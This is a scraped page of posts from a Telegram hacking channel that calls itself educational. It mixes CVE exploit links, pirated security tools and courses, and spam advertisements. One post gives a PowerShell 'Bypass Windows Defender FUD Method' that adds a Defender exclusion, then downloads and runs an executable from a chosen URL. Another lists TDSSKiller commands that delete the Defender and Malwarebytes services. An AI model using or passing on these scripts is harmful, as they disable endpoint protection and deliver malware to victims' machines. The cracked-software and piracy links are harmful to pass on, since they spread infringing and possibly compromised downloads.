whitehathacker47 | Unsorted

Telegram-канал whitehathacker47 - WHITE HAT HACKER

3888

❗️This is Educational Channel ❗️No Carding ❗️No Porn ❗️No Blackhat ❗️No illegal Activity ❗️We DoNot Support, Encourage & Promote Any illegal Activity All Post are Educational Puspose Only

Subscribe to a channel

WHITE HAT HACKER

Zed Attack Proxy Cookbook

#attack #hacking #eng

Читать полностью…

WHITE HAT HACKER

We are launching codecanyon like source code buy & sell platform worldwide

If you have ready code & documentation and if you are interested to sell your code scripts on our platform please dm me @cybergenofficial .

Note: please don't come with codecanyon nulled script.

Читать полностью…

WHITE HAT HACKER

CVE- 2024-48990 : Linux LPE via needrestart

PATCHED: Nov 19, 2024

PoC: https://github.com/makuga01/CVE-2024-48990-PoC

Info: https://www.qualys.com/2024/11/19/needrestart/needrestart.txt

P.S. Although you need to wait for needrestart to run for the add-on (which starts, for example, with apt upgrade ), the patch is only three days old, and it has not yet been added to all Debian repos)

#exploit #pentest #redteam #lpe #linux

Читать полностью…

WHITE HAT HACKER

Thor APT Scanner 10.7.17 - 29 Oct 2024 | Full version ( Not Cracked )

Читать полностью…

WHITE HAT HACKER

Windows inside a Docker container.

https://github.com/dockur/windows

Читать полностью…

WHITE HAT HACKER

Burp Suite Professional v2024.9.4 + BurpBounty_Pro 2.8.0 + JDK 22

NOTE - Run this version With Java SE JDK 22

Released Wednesday, 30 October 2024

@WHITEHATHACKER47 #pentest #security

Читать полностью…

WHITE HAT HACKER

THE ART OF WEB RECONNAISSANCE BUG BOUNTY ETHICAL HACKING

size : 2.9 GB

Language : English

Download link

https://mega.nz/folder/NuEAHQpQ#tFtXUXkov2-JmzQhv23l5w


Notice!!!

For those who can not Access ♿ our telegram channel through the formal 🖇️ link 🫰 A new 🔗 link Have been created again 🪐 so join through this link 🔗🖇️

❤️‍🔥Join Our Telegram Channel❤️‍🔥
🫀 /channel/whitehathacker47 🫀

Читать полностью…

WHITE HAT HACKER

How to Bypass OTP via Brute Force Using Burp Suite and ffuf,Also explain part of rate limit

Posted by @WHITEHATHACKER47

Читать полностью…

WHITE HAT HACKER

CVE-2024-7479 & CVE-2024-7481: TeamViewer User to Kernel LPE

PoC: https://youtu.be/lUkAMAK-TPI

exploit: https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481

Affected:
* from 15.0.0 before 15.58.4 
* from 14.0.0 before 14.7.48796 
* from 13.0.0 before 13.2.36225 
* from 12.0.0 before 12.0.259312 
* from 11.0.0 before 11.0.259311 


#lpe #pentest #redteam #exploit

Читать полностью…

WHITE HAT HACKER

🌜Bug Bounty Tools + Resources🌜

✅ Share with your Mates

✗ /channel/whitehathacker47 ✗

Читать полностью…

WHITE HAT HACKER

Burp Suite Professional v2024.8.1 + BurpBounty_Pro 2.8.0 + JDK 22

NOTE - Run this version With Java SE JDK 22

Released Friday, 13 September 2024

@WHITEHATHACKER47 #pentest #security

Читать полностью…

WHITE HAT HACKER

Kaspersky TDSSKiller abuse to disable EDR software

You can abuse TDSSKiller to interact with kernel-level services to disable EDR software running on the machine.
 
Removal of Malwarebytes Anti-Malware Service:

tdsskiller.exe -dcsvc MBAMService 


Removal of Microsoft Defender:
tdsskiller.exe -dcsvc windefend 


The "-dcsvc <service_name>" command deletes the specified service, removing the registry keys and executables associated with the service and software.

Читать полностью…

WHITE HAT HACKER

/channel/hamster_kombaT_bot/start?startapp=kentId6109716560
Play with me, become cryptoexchange CEO and get a token AirDrop!
💸 2k Coins as a first-time gift
🔥 25k Coins if you have Telegram Premium

Читать полностью…

WHITE HAT HACKER

🎭 Digital Marketing Premium Course [Free] 🎭

⚡️ Facebook Ads Mastery
⚡️ Digital Marketing 101
⚡️ Paid Ads Powershouse
⚡️ YouTube Ads Decoded
⚡️ Google Local Service Ads
⚡️ Supernova Strategies For PPC Profitability
⚡️ The Ad Agency Blueprint
⚡️ Strategic Creativity in Marketing
⚡️ Narratives with Numbers
⚡️ Quantum Marketing
⚡️ On The Edge of Success

📥 File Size: 60.28 GB

🔗 Link - https://mega.nz/folder/E2kXHC6a#GMWzTrBY1OZ8u25upTOkDg

⚠️ @WHITEHATHACKER47 😮

🤩Share Us For More - @WHITEHATHACKER47 👍

Читать полностью…

WHITE HAT HACKER

website hacking course ✅
#website #websitehackingcourse

@WHITEHATHACKER47 ⚡️

Читать полностью…

WHITE HAT HACKER

https://www.rootcon.org/html/archives/rc18

Читать полностью…

WHITE HAT HACKER

PEN-200: #Penetration Testing with Kali Linux

Читать полностью…

WHITE HAT HACKER

— Bypass Windows Defender FUD Method —

Add-MpPreference -ExclusionPath $env:USERPROFILE\Downloads
$url = 'Your URL'
$outputFile = [System.IO.Path]::Combine($env:USERPROFILE, 'Downloads', 'NAME.exe')

# Wait until the exclusion is confirmed (just a safeguard, usually it happens instantly)
Start-Sleep -Milliseconds 100

# Download the file
Invoke-WebRequest -Uri $url -OutFile $outputFile

# Run the downloaded file after the download is complete
Start-Process -FilePath $outputFile

Читать полностью…

WHITE HAT HACKER

Python implementation of GhostPack's Seatbelt situational awareness tool

https://github.com/0xthirteen/Carseat

#git #pentest #ad

Читать полностью…

WHITE HAT HACKER

🚀🚀 Canva Pro Subscription On Your Own Email Only In RS. 299/- 🚀🚀


LIMITED TIME OFFER
INSTANT ACCESS


https://gplcircle.com/product/canva-pro-subscription/

Buy using this link.

Or Contact Us On : @cybergenofficial / https://wa.me/+19093663616

#canva

Читать полностью…

WHITE HAT HACKER

Acunetix Premium - v24.9.240924_080

https://www.acunetix.com/changelogs/acunetix-premium/v24-9-1-on-prem-24-september-2024/

Читать полностью…

WHITE HAT HACKER

CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177: Linux OpenPrinting CUPS RCE

PoC: https://github.com/RickdeJager/cupshax

patch:

sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed


#exploit #git #pentest #redteam

Читать полностью…

WHITE HAT HACKER

⚡Top Hacking / Cyber Security Related Posts
🪪By Daniel Kelley

🔗https://cyte.in/cDBFR

Читать полностью…

WHITE HAT HACKER

Antivirus Evasion Hard Core

Language : English

Size : 1 GB

Last update : 20-09-2024

Info

1 - Course Prelude

2 - Lab Setup Configuration

3 - AV Evasion

Download link

https://mega.nz/file/g6MhzRbQ#TOKndyfmToiVLcqcyN2VYRNniA463nEWzkJhXLb4e54

Читать полностью…

WHITE HAT HACKER

XAMN Pro & All offline map

Pass - XAMN_ZDL

XAMN Pro is next level mobile forensics; a powerful intuitive tool that helps you find and analyze data faster, easier, with greater precision.

Читать полностью…

WHITE HAT HACKER

Phishing with a fake reCAPTCHA

This is small harness to recreate the social engineering and phishing lure recently seen in the wild around August/September 2024.

Читать полностью…

WHITE HAT HACKER

Nagios XI — RCE

Nagios XI 2024R1.01 has a vulnerability in the monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution.

Source:
https://github.com/MAWK0235/CVE-2024-24401

#nagios #sql #rce #privesc #poc #exploit

Читать полностью…

WHITE HAT HACKER

Acunetix Premium - v24.8.240828144 #Linux

https://zerodaylab.cloud/darkside/web_scanner_Setup/b77dbb804e3d4ee5f656d50fd7683d96/acunetix_24.8.240828144_x64.sh

https://www.acunetix.com/changelogs/acunetix-premium/v24-8-0-29-august-2024/

Читать полностью…

WHITE HAT HACKER

🎭 Earning With Facebook Hammad Kiyani Course 🎭

⚡️ Facebook Earning Cource
⚡️ Total 7 Classes
⚡️ Watch Classes And Start Earning

🔗 Link - https://drive.google.com/drive/folders/1Yg7lDSmvhUauOH3yM0-eGsbU7l9coKeI?usp=sharing...

⚠️ @WHITEHATHACKER47 😮

🤩 Share Us For More - @WHITEHATHACKER47 👀

Читать полностью…

WHITE HAT HACKER

HCL AppScan Standard v10.6.0 + трескаться

Недавние обновления - https://help.hcl-software.com/appscan/Standard/10.6.0/r_WhatsNew001.html

Читать полностью…
Subscribe to a channel